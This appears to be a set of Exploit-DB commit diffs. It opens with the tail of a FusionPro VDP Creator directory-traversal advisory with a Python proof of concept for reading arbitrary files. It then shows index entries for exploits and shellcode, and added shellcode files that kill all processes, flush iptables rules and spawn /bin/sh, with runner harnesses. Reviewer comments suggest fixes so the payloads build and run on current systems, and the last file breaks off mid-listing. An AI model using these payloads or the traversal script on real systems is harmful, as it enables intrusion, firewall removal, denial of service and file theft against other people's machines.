The response I've received from the vendor suggests that they care very little about the issue despite the criticality of this class of vulnerability. I'll quote the vendors response, "just delete it". Delete what exactly? Uninstall FusionPro VDP Creator? Or should one just delete FPProducerInternetServer.exe? The vendor also wasn't clear if any of the more current versions (10.0 and 10.1) are affected. All that was sent was, "since v9.3 there have been changes to this utility to restrict access to folders". It is possible that these versions are also susceptible to the issue as well based on the response from the vendor.
Resolution
Thankfully I found some better solutions other than "just delete it".
Open services.msc
Look for the service named FusionPro Internet Request Handler
Right-click and open the properties Window
Stop the service if it's running
Select disabled startup type
Or you could write a PowerShell script that does it automatically for you using the set-service and get-service cmdlets.
The nuclear option would be deleting the following executable, C:\Windows\SysWOW64\FPProducerInternetServer.exe. However, I don't know what affect this will have on the machine and FusionPro VDP Creator software. You could take a gamble and upgrade to the latest version .
'''
#######################
# PoC by: 0v3rride #
# DoC: February 2019 #
#######################
from requests import *
from sys import *;
def travel(fullurl):
r = get(fullurl);
print("-" * 80 + "\n[i]: Supplied URL: {}".format(fullurl))
print("-" * 80 + "\n[i]: Response Status Code: {}".format(r.status_code));
print("-" * 80 + "\n[i]: Response Headers:\n");
for hdr in r.headers:
print("{}: {}".format(hdr, r.headers[hdr]));
print("-" * 80 + "\n[i]: RAW DATA RETURNED FROM RESPONSE: \n{}".format(r.text));
if len(argv) < 3:
print("[i]: Usage -- ./poc <http(s)://FQDN or http(s)://<IP address>:<Port #> <file to query on the local machine that is affected (e.g. /windows/system32/drivers/etc/hosts)");
print("[i]: Path needs to start with a '/'.");
else:
try:
print("[i]: https://github.com/0v3rride/");
print("-" * 80 + "\n[!] Sending the request...");
travel(argv[1] + argv[2]);
except RequestException as re:
print(re.strerror);
finally:
print("-" * 80 + "\n[!] Done!");
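Review bot: `except RequestException as re: print(re.strerror)` near the end of the script will in most cases print `None`: RequestException derives from IOError, and for connection or HTTP-layer failures requests does not populate `strerror`, so the real failure reason is lost. `print(re)` reports the message requests attached to the exception. Naming the variable `re` also shadows the standard-library module name, and the two wildcard imports `from requests import *` / `from sys import *` hide that only `get`, `RequestException` and `argv` are used; `from requests import get, RequestException` and `from sys import argv` would state that directly. The trailing semicolons throughout `travel` and the `__main__` section are noise in Python and can be dropped.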


@ -6176,6 +6176,7 @@ id,file,description,date,author,type,platform,port
45762,exploits/windows_x86/dos/45762.py,"Arm Whois 3.11 - Denial of Service (PoC)",2018-11-01,"Yair Rodríguez Aparicio",dos,windows_x86,
45769,exploits/windows_x86-64/dos/45769.py,"WinMTR 0.91 - Denial of Service (PoC)",2018-11-02,"Ihsan Sencan",dos,windows_x86-64,
45770,exploits/windows_x86-64/dos/45770.py,"CdCatalog 2.3.1 - Denial of Service (PoC)",2018-11-02,"Ihsan Sencan",dos,windows_x86-64,
46485,exploits/windows/dos/46485.html,"Microsoft Edge Chakra 1.11.4 - Read Permission via Type Confusion",2019-03-04,"Fahad Aid Alharbi",dos,windows,
45772,exploits/windows_x86-64/dos/45772.py,"Zint Barcode Generator 2.6 - Denial of Service (PoC)",2018-11-02,"Ihsan Sencan",dos,windows_x86-64,
45781,exploits/windows_x86-64/dos/45781.py,"Softros LAN Messenger 9.2 - Denial of Service (PoC)",2018-11-05,"Victor Mondragón",dos,windows_x86-64,
45786,exploits/ios/dos/45786.txt,"FaceTime - RTP Video Processing Heap Corruption",2018-11-06,"Google Security Research",dos,ios,
@ -6306,6 +6307,7 @@ id,file,description,date,author,type,platform,port
46356,exploits/android/dos/46356.txt,"Android - binder Use-After-Free via fdget() Optimization",2019-02-12,"Google Security Research",dos,android,
46357,exploits/android/dos/46357.txt,"Android - binder Use-After-Free of VMA via race Between reclaim and munmap",2019-02-12,"Google Security Research",dos,android,
46358,exploits/asp/dos/46358.py,"Skyworth GPON HomeGateways and Optical Network Terminals - Stack Overflow",2019-02-12,"Kaustubh G. Padwad",dos,asp,80
46484,exploits/linux/dos/46484.txt,"FileZilla 3.40.0 - 'Local search' / 'Local site' Denial of Service (PoC)",2019-03-04,"Mr Winst0n",dos,linux,
46439,exploits/linux/dos/46439.py,"Valentina Studio 9.0.5 Linux - 'Host' Buffer Overflow (PoC)",2019-02-21,"Alejandra Sánchez",dos,linux,
46367,exploits/windows/dos/46367.py,"NetworkSleuth 3.0 - 'Name' Denial of Service (PoC)",2019-02-13,"Alejandra Sánchez",dos,windows,
46371,exploits/windows/dos/46371.py,"Core FTP/SFTP Server 1.2 Build 589.42 - 'User domain' Denial of Service (PoC)",2019-02-14,"Victor Mondragón",dos,windows,
@ -6338,6 +6340,7 @@ id,file,description,date,author,type,platform,port
46458,exploits/windows/dos/46458.py,"Xlight FTP Server 3.9.1 - Buffer Overflow (PoC)",2019-02-25,"Logan Whitmire",dos,windows,
46464,exploits/android/dos/46464.py,"FTP Server 1.32 - Denial of Service",2019-02-28,s4vitar,dos,android,
46465,exploits/linux/dos/46465.txt,"WebKitGTK 2.23.90 / WebKitGTK+ 2.22.6 - Denial of Service",2019-02-28,"Dhiraj Mishra",dos,linux,
46469,exploits/hardware/dos/46469.py,"Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow",2019-02-28,"Artem Metla",dos,hardware,
46470,exploits/windows/dos/46470.py,"TransMac 12.3 - Denial of Service (PoC)",2019-02-28,"Alejandra Sánchez",dos,windows,
46472,exploits/multiple/dos/46472.txt,"Google Chrome < M72 - PaymentRequest Service Use-After-Free",2019-03-01,"Google Security Research",dos,multiple,
46473,exploits/multiple/dos/46473.txt,"Google Chrome < M72 - RenderFrameHostImpl::CreateMediaStreamDispatcherHost Use-After-Free",2019-03-01,"Google Security Research",dos,multiple,
@ -10203,7 +10206,7 @@ id,file,description,date,author,type,platform,port
45378,exploits/windows_x86-64/local/45378.py,"InTouch Machine Edition 8.1 SP1 - 'Nombre del Tag' Buffer Overflow (SEH)",2018-09-11,"Luis Martínez",local,windows_x86-64,
45379,exploits/android/local/45379.txt,"Android - 'zygote->init;' Chain from USB Privilege Escalation",2018-09-11,"Google Security Research",local,android,
45395,exploits/windows_x86-64/local/45395.py,"InduSoft Web Studio 8.1 SP1 - 'Tag Name' Buffer Overflow (SEH)",2018-09-13,"Luis Martínez",local,windows_x86-64,
45401,exploits/windows/local/45401.c,"STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation",2018-09-13,"Parvez Anwar",local,windows,
45401,exploits/windows/local/45401.c,"STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation (1)",2018-09-13,"Parvez Anwar",local,windows,
45402,exploits/windows/local/45402.py,"Faleemi Desktop Software 1.8.2 - 'SavePath for ScreenShots' Buffer Overflow (SEH)",2018-09-13,"Gionathan Reale",local,windows,
45403,exploits/windows_x86/local/45403.py,"Free MP3 CD Ripper 2.6 - '.mp3' Buffer Overflow (SEH)",2018-09-13,"Gionathan Reale",local,windows_x86,
45406,exploits/windows/local/45406.py,"Socusoft Photo to Video Converter 8.07 - 'Registration Name' Buffer Overflow",2018-09-13,ZwX,local,windows,
@ -10236,6 +10239,7 @@ id,file,description,date,author,type,platform,port
45626,exploits/windows/local/45626.rb,"VLC Media Player - MKV Use-After-Free (Metasploit)",2018-10-16,Metasploit,local,windows,
45627,exploits/windows_x86/local/45627.py,"Any Sound Recorder 2.93 - Buffer Overflow (SEH)",2018-10-17,"Abdullah Alıç",local,windows_x86,
45631,exploits/linux/local/45631.md,"Git Submodule - Arbitrary Code Execution",2018-10-16,joernchen,local,linux,
45496,exploits/windows/local/45496.c,"STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation (2)",2019-03-04,"Ivan Ivanovic",local,windows,
45653,exploits/windows/local/45653.rb,"Microsoft Windows - SetImeInfoEx Win32k NULL Pointer Dereference (Metasploit)",2018-10-22,Metasploit,local,windows,
45660,exploits/windows/local/45660.py,"Microsoft Windows 10 - Local Privilege Escalation (UAC Bypass)",2018-10-22,"Fabien DROMAS",local,windows,
45675,exploits/windows/local/45675.md,"Microsoft Data Sharing - Local Privilege Escalation (PoC)",2018-10-23,SandboxEscaper,local,windows,
@ -27399,7 +27403,7 @@ id,file,description,date,author,type,platform,port
22030,exploits/php/webapps/22030.php,"vBulletin 2.0/2.2.x - 'memberlist.php' Cross-Site Scripting",2002-11-22,Sp.IC,webapps,php,
22037,exploits/php/webapps/22037.txt,"PHP-Nuke 5.x/6.0/6.5 Beta 1 - Multiple Cross-Site Scripting Vulnerabilities",2002-11-25,"Matthew Murphy",webapps,php,
22038,exploits/php/webapps/22038.txt,"Sisfokol 4.0 - Arbitrary File Upload",2012-10-17,cr4wl3r,webapps,php,
22039,exploits/php/webapps/22039.txt,"symphony CMS 2.3 - Multiple Vulnerabilities",2012-10-17,Wireghoul,webapps,php,
22039,exploits/php/webapps/22039.txt,"Symphony CMS 2.3 - Multiple Vulnerabilities",2012-10-17,Wireghoul,webapps,php,
22040,exploits/jsp/webapps/22040.txt,"ManageEngine Support Center Plus 7908 - Multiple Vulnerabilities",2012-10-17,xistence,webapps,jsp,
22041,exploits/multiple/webapps/22041.txt,"Oracle WebCenter Sites (FatWire Content Server) - Multiple Vulnerabilities",2012-10-17,"SEC Consult",webapps,multiple,
22042,exploits/php/webapps/22042.php,"vBulletin 2.0.x/2.2.x - 'members2.php' Cross-Site Scripting",2002-11-25,Sp.IC,webapps,php,
@ -34987,7 +34991,7 @@ id,file,description,date,author,type,platform,port
34583,exploits/hardware/webapps/34583.txt,"TP-Link TL-WR340G / TL-WR340GD - Multiple Vulnerabilities",2014-09-08,smash,webapps,hardware,80
34584,exploits/hardware/webapps/34584.txt,"TP-Link TL-WR841N / TL-WR841ND - Multiple Vulnerabilities",2014-09-08,smash,webapps,hardware,80
34585,exploits/php/webapps/34585.txt,"Atmail Webmail 7.2 - Multiple Vulnerabilities",2014-09-08,smash,webapps,php,443
34586,exploits/php/webapps/34586.txt,"Mpay24 PrestaShop Payment Module 1.5 - Multiple Vulnerabilities",2014-09-08,"Eldar Marcussen",webapps,php,80
34586,exploits/php/webapps/34586.txt,"Mpay24 PrestaShop Payment Module 1.5 - Multiple Vulnerabilities",2014-09-08,Wireghoul,webapps,php,80
34587,exploits/multiple/webapps/34587.txt,"Jenkins 1.578 - Multiple Vulnerabilities",2014-09-08,JoeV,webapps,multiple,8090
34589,exploits/php/webapps/34589.txt,"WordPress Plugin WP Support Plus Responsive Ticket System 2.0 - Multiple Vulnerabilities",2014-09-09,"Fikri Fadzil",webapps,php,
34593,exploits/php/webapps/34593.txt,"Parallels Plesk Sitebuilder 9.5 - Multiple Vulnerabilities",2014-09-09,alieye,webapps,php,
@ -40241,6 +40245,7 @@ id,file,description,date,author,type,platform,port
44960,exploits/php/webapps/44960.html,"DAMICMS 6.0.0 - Cross-Site Request Forgery (Add Admin)",2018-07-02,bay0net,webapps,php,80
44964,exploits/php/webapps/44964.txt,"Dolibarr ERP/CRM < 7.0.3 - PHP Code Injection",2018-07-02,om3rcitak,webapps,php,80
44973,exploits/lua/webapps/44973.py,"ntop-ng < 3.4.180617 - Authentication Bypass",2018-07-03,"Ioannis Profetis",webapps,lua,
46489,exploits/hardware/webapps/46489.txt,"Raisecom XPON ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 - Remote Code Execution",2019-03-04,JameelNabbo,webapps,hardware,80
44975,exploits/java/webapps/44975.py,"ManageEngine Exchange Reporter Plus < Build 5311 - Remote Code Execution",2018-07-04,"Kacper Szurek",webapps,java,8181
44976,exploits/php/webapps/44976.py,"CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution",2018-07-04,"Mustafa Hasan",webapps,php,
44977,exploits/php/webapps/44977.txt,"Online Trade - Information Disclosure",2018-07-04,L0RD,webapps,php,
@ -40249,6 +40254,7 @@ id,file,description,date,author,type,platform,port
44981,exploits/php/webapps/44981.txt,"SoftExpert Excellence Suite 2.0 - 'cddocument' SQL Injection",2018-07-05,"Seren PORSUK",webapps,php,80
44986,exploits/windows/webapps/44986.txt,"Airties AIR5444TT - Cross-Site Scripting",2018-07-06,"Raif Berkay Dincel",webapps,windows,80
44988,exploits/php/webapps/44988.txt,"Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting",2018-07-09,"Ahmed Elhady Mohamed",webapps,php,
46488,exploits/php/webapps/46488.txt,"zzzphp CMS 1.6.1 - Cross-Site Request Forgery",2019-03-04,"Yang Chenglong",webapps,php,80
44996,exploits/multiple/webapps/44996.py,"Gitea 1.4.0 - Remote Code Execution",2018-07-04,"Kacper Szurek",webapps,multiple,
44997,exploits/php/webapps/44997.txt,"WolfSight CMS 3.2 - SQL Injection",2018-07-10,"Berk Dusunur",webapps,php,80
44998,exploits/multiple/webapps/44998.py,"Oracle WebLogic 12.1.2.0 - RMI Registry UnicastRef Object Java Deserialization Remote Code Execution",2018-07-07,bobsecq,webapps,multiple,
@ -40436,6 +40442,7 @@ id,file,description,date,author,type,platform,port
45487,exploits/hardware/webapps/45487.txt,"RICOH MP 305+ Printer - Cross-Site Scripting",2018-09-25,"Ismail Tasdelen",webapps,hardware,
45490,exploits/hardware/webapps/45490.txt,"RICOH MP C406Z Printer - Cross-Site Scripting",2018-09-25,"Ismail Tasdelen",webapps,hardware,
45491,exploits/php/webapps/45491.txt,"Joomla! Component Responsive Portfolio 1.6.1 - 'filter_order_Dir' SQL Injection",2018-09-25,AkkuS,webapps,php,
46487,exploits/windows/webapps/46487.py,"Splunk Enterprise 7.2.4 - Custom App RCE (Persistent Backdoor - Custom Binary Payload)",2019-03-04,"Matteo Malvica",webapps,windows,8000
45498,exploits/windows/webapps/45498.txt,"iWay Data Quality Suite Web Console 10.6.1.ga - XML External Entity Injection",2018-09-27,"Sureshbabu Narvaneni",webapps,windows,
45499,exploits/java/webapps/45499.txt,"ManageEngine Desktop Central 10.0.271 - Cross-Site Scripting",2018-09-27,"Ismail Tasdelen",webapps,java,
45500,exploits/windows_x86-64/webapps/45500.txt,"Rausoft ID.prove 2.95 - 'Username' SQL injection",2018-09-27,"Ilya Timchenko",webapps,windows_x86-64,
@ -40545,6 +40552,7 @@ id,file,description,date,author,type,platform,port
45699,exploits/php/webapps/45699.txt,"MPS Box 0.1.8.0 - Arbitrary File Upload",2018-10-26,"Ihsan Sencan",webapps,php,
45700,exploits/php/webapps/45700.txt,"Delta Sql 1.8.2 - 'id' SQL Injection",2018-10-26,"Ihsan Sencan",webapps,php,
45701,exploits/php/webapps/45701.txt,"Veterinary Clinic Management 00.02 - 'editpetnum' SQL Injection",2018-10-26,"Ihsan Sencan",webapps,php,
46486,exploits/php/webapps/46486.rb,"Booked Scheduler 2.7.5 - Remote Command Execution (Metasploit)",2019-03-04,AkkuS,webapps,php,80
45703,exploits/php/webapps/45703.txt,"Open Faculty Evaluation System 5.6 - 'batch_name' SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,
45704,exploits/php/webapps/45704.txt,"Grapixel New Media 2 - 'pageref' SQL Injection",2018-10-29,"Berk Dusunur",webapps,php,
45706,exploits/aspx/webapps/45706.vb,"Library Management System 1.0 - 'frmListBooks' SQL Injection",2018-10-29,"Ihsan Sencan",webapps,aspx,
@ -40848,6 +40856,7 @@ id,file,description,date,author,type,platform,port
46273,exploits/php/webapps/46273.txt,"MyBB IP History Logs Plugin 1.0.2 - Cross-Site Scripting",2019-01-28,0xB9,webapps,php,80
46274,exploits/php/webapps/46274.txt,"ResourceSpace 8.6 - 'collection_edit.php' SQL Injection",2019-01-28,dd_,webapps,php,80
46276,exploits/php/webapps/46276.txt,"PDF Signer 3.0 - Server-Side Template Injection leading to Remote Command Execution (via Cross-Site Request Forgery Cookie)",2019-01-29,dd_,webapps,php,80
46482,exploits/php/webapps/46482.txt,"OOP CMS BLOG 1.0 - Multiple SQL Injection",2019-03-04,"Mr Winst0n",webapps,php,80
46282,exploits/php/webapps/46282.txt,"Rukovoditel Project Management CRM 2.4.1 - 'lists_id' SQL Injection",2019-01-30,"Mehmet EMIROGLU",webapps,php,80
46305,exploits/windows/webapps/46305.txt,"SureMDM < 2018-11 Patch - Local / Remote File Inclusion",2019-02-01,"Digital Interruption",webapps,windows,80
40053,exploits/php/webapps/40053.py,"Tiki Wiki 15.1 - File Upload",2016-07-07,"Ivan Ivanovic",webapps,php,80
@ -40879,6 +40888,7 @@ id,file,description,date,author,type,platform,port
46352,exploits/linux/webapps/46352.rb,"Jenkins 2.150.2 - Remote Command Execution (Metasploit)",2019-02-12,AkkuS,webapps,linux,
46353,exploits/aspx/webapps/46353.cs,"BlogEngine.NET 3.3.6 - Directory Traversal / Remote Code Execution",2019-02-12,"Dustin Cobb",webapps,aspx,
46354,exploits/php/webapps/46354.txt,"LayerBB 1.1.2 - Cross-Site Scripting",2019-02-12,0xB9,webapps,php,80
46483,exploits/php/webapps/46483.txt,"OOP CMS BLOG 1.0 - Multiple Cross-Site Request Forgery",2019-03-04,"Mr Winst0n",webapps,php,80
46440,exploits/php/webapps/46440.txt,"EI-Tube 3 - SQL Injection",2019-02-21,"Meisam Monsef",webapps,php,80
46366,exploits/php/webapps/46366.txt,"Rukovoditel Project Management CRM 2.4.1 - Cross-Site Scripting",2019-02-13,"Mehmet EMIROGLU",webapps,php,80
46368,exploits/php/webapps/46368.txt,"PilusCart 1.4.1 - 'send' SQL Injection",2019-02-13,"Mehmet EMIROGLU",webapps,php,80
@ -40930,3 +40940,10 @@ id,file,description,date,author,type,platform,port
46467,exploits/php/webapps/46467.txt,"Joomla! Component J2Store < 3.3.7 - SQL Injection",2019-02-28,"Andrei Conache",webapps,php,
46468,exploits/linux/webapps/46468.rb,"Usermin 1.750 - Remote Command Execution (Metasploit)",2019-02-28,AkkuS,webapps,linux,
46471,exploits/php/webapps/46471.rb,"Feng Office 3.7.0.5 - Remote Command Execution (Metasploit)",2019-02-28,AkkuS,webapps,php,
46480,exploits/php/webapps/46480.txt,"CMSsite 1.0 - Multiple Cross-Site Request Forgery",2019-03-04,"Mr Winst0n",webapps,php,80
46481,exploits/php/webapps/46481.py,"elFinder 2.1.47 - Command Injection vulnerability in the PHP connector",2019-03-04,q3rv0,webapps,php,80
46494,exploits/windows/webapps/46494.py,"MarcomCentral FusionPro VDP Creator < 10.0 - Directory Traversal",2019-03-04,0v3rride,webapps,windows,
46495,exploits/php/webapps/46495.txt,"Bolt CMS 3.6.4 - Cross-Site Scripting",2019-03-04,"Ismail Tasdelen",webapps,php,80
46496,exploits/php/webapps/46496.txt,"Craft CMS 3.1.12 Pro - Cross-Site Scripting",2019-03-04,"Ismail Tasdelen",webapps,php,80
46497,exploits/php/webapps/46497.txt,"WordPress Plugin Cerber Security_ Antispam & Malware Scan 8.0 - Multiple Bypass Vulnerabilities",2019-03-04,ed0x21son,webapps,php,80
46498,exploits/hardware/webapps/46498.txt,"Fiberhome AN5506-04-F RP2669 - Persistent Cross-Site Scripting",2019-03-04,Tauco,webapps,hardware,80



@ -843,6 +843,7 @@ id,file,description,date,author,type,platform
43954,shellcodes/linux_x86-64/43954.nasm,"Linux/x64 - Custom Encoded XOR + execve(/bin/sh) Shellcode",2017-12-16,0x4ndr3,shellcode,linux_x86-64
43955,shellcodes/generator/43955.py,"Linux/x64 - Custom Encoded XOR + Polymorphic + execve(/bin/sh) Shellcode (Generator)",2017-12-19,0x4ndr3,shellcode,generator
43956,shellcodes/linux_x86-64/43956.c,"Linux/x64 - Twofish Encoded + DNS (CNAME) Password + execve(/bin/sh) Shellcode",2018-02-02,0x4ndr3,shellcode,linux_x86-64
46493,shellcodes/linux_x86/46493.c,"Linux/x86 - NOT Encoder / Decoder - execve() /bin/sh Shellcode (44 bytes)",2019-03-04,"Daniele Votta",shellcode,linux_x86
44143,shellcodes/arm/44143.s,"Linux/ARM - Bind (4444/TCP) Shell (/bin/sh) + IP Controlled (192.168.1.190) + Null-Free Shellcode (168 bytes)",2018-02-19,rtmcx,shellcode,arm
42295,shellcodes/linux_x86/42295.c,"Linux/x86 - Reverse (127.1.1.1:11111/TCP) Shell + Null-Free Shellcode (67 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
41723,shellcodes/linux_x86/41723.c,"Linux/x86 - Reverse (192.168.3.119:54321/TCP) Shell (/bin/bash) Shellcode (110 bytes)",2017-03-24,JR0ch17,shellcode,linux_x86
@ -888,9 +889,11 @@ id,file,description,date,author,type,platform
44738,shellcodes/linux_x86/44738.c,"Linux/x86 - Reverse (10.10.2.4:4444/TCP) Shell Shellcode (68 bytes)",2018-05-24,"Nuno Freitas",shellcode,linux_x86
44740,shellcodes/linux_x86/44740.c,"Linux/x86 - Reverse (10.0.7.17:4444/TCP) Shell (/bin/sh) Shellcode (101 Bytes)",2018-05-24,"Jonathan Crosby",shellcode,linux_x86
44791,shellcodes/linux_x86/44791.c,"Linux/x86 - Bind (5555/TCP) Shell (/bin/sh) Shellcode (98 bytes)",2018-05-28,Luca,shellcode,linux_x86
46492,shellcodes/linux_x86-64/46492.c,"Linux/x64 - Kill All Processes Shellcode (11 bytes)",2019-03-04,"Aron Mihaljevic",shellcode,linux_x86-64
44807,shellcodes/linux_x86/44807.c,"Linux/x86 - Egghunter (0xdeadbeef) + access() + execve(/bin/sh) Shellcode (38 bytes)",2018-05-31,"Paolo Perego",shellcode,linux_x86
44808,shellcodes/linux_x86/44808.c,"Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (105 bytes)",2018-05-31,"Paolo Perego",shellcode,linux_x86
44811,shellcodes/arm/44811.c,"Linux/ARM - Egghunter (0x50905090) + execve('/bin/sh') Shellcode (32 bytes)",2018-05-31,"Ken Kitahara",shellcode,arm
46491,shellcodes/linux_x86/46491.c,"Linux/x86 - iptables -F Shellcode (43 bytes)",2019-03-04,"Cameron Brown",shellcode,linux_x86
44856,shellcodes/arm/44856.c,"Linux/ARM - Egghunter (0x50905090) + execve('/bin/sh') Shellcode (60 bytes)",2018-06-08,rtmcx,shellcode,arm
44963,shellcodes/linux_x86/44963.c,"Linux/x86 - Execve /bin/cat /etc/passwd Shellcode (37 bytes)",2018-07-02,"Anurag Srivastava",shellcode,linux_x86
44990,shellcodes/linux_x86/44990.c,"Linux/x86 - Kill Process Shellcode (20 bytes)",2018-07-09,"Nathu Nandwani",shellcode,linux_x86

1 id file description date author type platform
843 43954 shellcodes/linux_x86-64/43954.nasm Linux/x64 - Custom Encoded XOR + execve(/bin/sh) Shellcode 2017-12-16 0x4ndr3 shellcode linux_x86-64
844 43955 shellcodes/generator/43955.py Linux/x64 - Custom Encoded XOR + Polymorphic + execve(/bin/sh) Shellcode (Generator) 2017-12-19 0x4ndr3 shellcode generator
845 43956 shellcodes/linux_x86-64/43956.c Linux/x64 - Twofish Encoded + DNS (CNAME) Password + execve(/bin/sh) Shellcode 2018-02-02 0x4ndr3 shellcode linux_x86-64
846 46493 shellcodes/linux_x86/46493.c Linux/x86 - NOT Encoder / Decoder - execve() /bin/sh Shellcode (44 bytes) 2019-03-04 Daniele Votta shellcode linux_x86
847 44143 shellcodes/arm/44143.s Linux/ARM - Bind (4444/TCP) Shell (/bin/sh) + IP Controlled (192.168.1.190) + Null-Free Shellcode (168 bytes) 2018-02-19 rtmcx shellcode arm
848 42295 shellcodes/linux_x86/42295.c Linux/x86 - Reverse (127.1.1.1:11111/TCP) Shell + Null-Free Shellcode (67 bytes) 2013-01-01 Geyslan G. Bem shellcode linux_x86
849 41723 shellcodes/linux_x86/41723.c Linux/x86 - Reverse (192.168.3.119:54321/TCP) Shell (/bin/bash) Shellcode (110 bytes) 2017-03-24 JR0ch17 shellcode linux_x86
889 44738 shellcodes/linux_x86/44738.c Linux/x86 - Reverse (10.10.2.4:4444/TCP) Shell Shellcode (68 bytes) 2018-05-24 Nuno Freitas shellcode linux_x86
890 44740 shellcodes/linux_x86/44740.c Linux/x86 - Reverse (10.0.7.17:4444/TCP) Shell (/bin/sh) Shellcode (101 Bytes) 2018-05-24 Jonathan Crosby shellcode linux_x86
891 44791 shellcodes/linux_x86/44791.c Linux/x86 - Bind (5555/TCP) Shell (/bin/sh) Shellcode (98 bytes) 2018-05-28 Luca shellcode linux_x86
892 46492 shellcodes/linux_x86-64/46492.c Linux/x64 - Kill All Processes Shellcode (11 bytes) 2019-03-04 Aron Mihaljevic shellcode linux_x86-64
893 44807 shellcodes/linux_x86/44807.c Linux/x86 - Egghunter (0xdeadbeef) + access() + execve(/bin/sh) Shellcode (38 bytes) 2018-05-31 Paolo Perego shellcode linux_x86
894 44808 shellcodes/linux_x86/44808.c Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (105 bytes) 2018-05-31 Paolo Perego shellcode linux_x86
895 44811 shellcodes/arm/44811.c Linux/ARM - Egghunter (0x50905090) + execve('/bin/sh') Shellcode (32 bytes) 2018-05-31 Ken Kitahara shellcode arm
896 46491 shellcodes/linux_x86/46491.c Linux/x86 - iptables -F Shellcode (43 bytes) 2019-03-04 Cameron Brown shellcode linux_x86
897 44856 shellcodes/arm/44856.c Linux/ARM - Egghunter (0x50905090) + execve('/bin/sh') Shellcode (60 bytes) 2018-06-08 rtmcx shellcode arm
898 44963 shellcodes/linux_x86/44963.c Linux/x86 - Execve /bin/cat /etc/passwd Shellcode (37 bytes) 2018-07-02 Anurag Srivastava shellcode linux_x86
899 44990 shellcodes/linux_x86/44990.c Linux/x86 - Kill Process Shellcode (20 bytes) 2018-07-09 Nathu Nandwani shellcode linux_x86


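--- a/shellcodes/linux_x86-64/46492.c
+++ b/shellcodes/linux_x86-64/46492.c
@@ -0,0 +1,64 @@
+/*
+;Title: Linux/x86_64 - KILL_ALL
+;Author: Aron Mihaljevic
+;Architecture: Linux x86_64
+;Shellcode Length: 11 bytes
+========DESCTIPTION===========================
+#include <sys/types.h>
+#include <signal.h>
+int kill(pid_t pid, int sig);
+===COMPILATION AND EXECUTION==================
+#nasm -f elf64 kill.nasm -o kill.o
+#ld kill.o -o kill
+=================SHELLCODE================
+global _start
+section .text
+_start:
+push 0x3e ; sys kill
+pop rax
+push -1 ; pid
+pop rdi
+push 0x9 ; sig kill
+pop rsi
+syscall
+====================FOR C Compile===========================
+# gcc -fno-stack-protector -z execstack shell-testing.c -o shell-testing
+*/
+#include<stdio.h>
+#include<string.h>
+unsigned char code[] = \
+"\x6a\x3e\x58\x6a\xff\x5f\x6a\x09\x5e\x0f\x05";
+main()
+{
+printf("Shellcode Length: %d\n", (int)strlen(code));
+int (*ret)() = (int(*)())code;
+ret();
+}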
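Review bot: `main()` with no return type at the top of the harness relies on implicit int, which C99 removed and current GCC rejects by default; declare it `int main(void)` and finish with `return 0;`. The compile line in the header comment (`-z execstack`) also carries an unstated assumption: `code[]` lives in .data, and on x86-64 an executable stack only made data mappings executable through the kernel's read-implies-exec behaviour, which as far as I recall was dropped for 64-bit binaries in Linux 5.8, so `ret()` faults on newer kernels unless the buffer is placed in executable memory explicitly. I'd document that dependency next to the gcc line, since an NX data segment is exactly the mitigation a tester should expect to run into. Minor: the banner reads `DESCTIPTION`.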


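--- a/shellcodes/linux_x86/46491.c
+++ b/shellcodes/linux_x86/46491.c
@@ -0,0 +1,55 @@
+/**********************************************/
+/* linux/x86 iptables -F Length: 43 bytes */
+/* */
+/* 03/01/2019 */
+/* */
+/* Author: Cameron Brown */
+/* */
+/* Email: pwoerTF@gmail.com */
+/**********************************************/
+global _start
+section .text
+_start:
+jmp short get
+code:
+pop ebx
+cdq
+mov [ebx+0xe], dl
+lea eax, [ebx+0xf]
+push edx
+push eax
+push ebx
+mov ecx, esp
+mov eax, edx
+mov al, 0xb
+int 0x80
+get:
+call code
+file: db "/sbin/iptables#-F"
+--------------------------------------------------
+#include<stdio.h>
+#include<string.h>
+unsigned char code[] = \
+"\xeb\x13\x5b\x99\x88\x53\x0e\x8d\x43\x0f\x52\x50\x53\x89\xe1\x89\xd0\xb0\x0b\xcd\x80\xe8\xe8\xff\xff\xff\x2f\x73\x62\x69\x6e\x2f\x69\x70\x74\x61\x62\x6c\x65\x73\x23\x2d\x46";
+main()
+{
+printf("Shellcode Length: %d\n", strlen(code));
+int (*ret)() = (int(*)())code;
+ret();
+}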
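Review bot: `printf("Shellcode Length: %d\n", strlen(code));` passes a size_t to a `%d` conversion, which is undefined behaviour and a -Wformat warning; use `%zu`, or cast to int as 46492.c in this commit does. The same line appears in 46493.c. The file also gives no build instructions and nothing in the hunk states that this is 32-bit code: built on an x86-64 host without `-m32` the `int 0x80` path runs inside a 64-bit process where stack addresses are presumably truncated to 32 bits, so the argument vector built by `mov ecx, esp` is wrong; a comment next to `unsigned char code[]` naming the target and the flags (`gcc -m32 -fno-stack-protector -z execstack`) would save the next reader a segfault. `main()` is implicit-int here too and should be `int main(void)`.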


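--- a/shellcodes/linux_x86/46493.c
+++ b/shellcodes/linux_x86/46493.c
@@ -0,0 +1,99 @@
+/*
+; Date: 02/03/2019
+; NOT-Encoder.py
+; Author: Daniele Votta
+; Description: This program encode shellcode with NOT technique.
+; Tested on: i686 GNU/Linux
+; Shellcode Length:25
+#!/usr/bin/python
+# Python NOT Encoder
+# Execve /bin/sh
+shellcode =("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")
+encoded = ""
+encoded2 = ""
+print 'Encoded shellcode...'
+for x in bytearray(shellcode):
+# NOT Encoding
+y = ~x
+encoded += '\\x'
+encoded += '%02x' % (y & 0xff)
+encoded2 += '0x'
+encoded2 += '%02x,' % (y & 0xff)
+print encoded +"\n"
+print encoded2
+print 'Len: %d' % len(bytearray(shellcode))
+*/
+#include<stdio.h>
+#include<string.h>
+/*
+; NOT-Decoder.asm
+; Author: Daniele Votta
+; Description: This program decode shellcode with NOT technique.
+; Tested on: i686 GNU/Linux
+; Shellcode Length:44
+; JMP | CALL | POP | Techniques
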